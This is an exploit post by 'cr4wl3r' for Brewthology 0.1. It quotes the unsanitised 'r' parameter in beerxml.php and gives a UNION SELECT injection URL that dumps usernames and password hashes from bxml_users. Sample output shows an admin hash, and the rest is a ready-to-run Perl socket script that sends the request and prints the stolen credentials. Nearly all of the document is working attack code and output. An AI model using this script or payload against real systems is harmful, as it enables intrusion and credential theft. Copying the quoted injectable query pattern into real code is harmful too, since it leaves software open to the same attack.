#Brewthology 0.1 SQL Injection Exploit #By cr4wl3r http://bastardlabs.info #Script: http://sourceforge.net/projects/brewthology/files/brewthology/v0.1%20public%20beta/ #Demo: http://bastardlabs.info/demo/brewthology.png #Tested: Win 7 # # Bugs found in beerxml.php # # if (isset($_GET['r'])) # { # $recipenum = $_GET['r']; # # // Pull Data from DB # $recipes = "SELECT * FROM bxml_recipes WHERE reciperecid=$recipenum"; # $recresult = @mysql_query ($recipes); # } # # http://bastardlabs/[path]/beerxml.php?r=[SQLi] # Example: http://bastardlabs/[path]/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users # # # $ perl brewthology.pl localhost /demo/ # [+] Please Wait ... # # [+] Getting Username and Password [ ok ] # [+] w00tw00t # [+] Username | Password --> admin:ab4d8d2a5f480a137067da17100271cd176607a1 #!/usr/bin/perl use IO::Socket; $host = $ARGV[0]; $path = $ARGV[1]; if (@ARGV < 2) { print qq( +---------------------------------------------+ | Brewthology 0.1 SQL Injection Exploit | | | | coded & exploited by cr4wl3r | | http://bastardlabs.info/ | +---------------------------------------------+ -=[X]=- +--------------------------------------- Usage : perl $0 ex : perl $0 127.0.0.1 /Brewthology/ +--------------------------------------- ); } $target = "http://".$host.$path."/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") || die "[-] Can't connect to Server [ failed ]\n"; print "[+] Please Wait ...\n"; print $sock "GET $target HTTP/1.1\n"; print $sock "Accept: */*\n"; print $sock "User-Agent: BastardLabs\n"; print $sock "Host: $host\n"; print $sock "Connection: close\n\n"; sleep 2; while ($answer = <$sock>) { if ($answer =~ /(.*?)<\/USE>/) { print "\n[+] Getting Username and Password [ ok ]\n"; sleep 1; print "[+] w00tw00t\n"; print "[+] Username | Password --> $1\n"; exit(); } } print "[-] Exploit Failed !\n";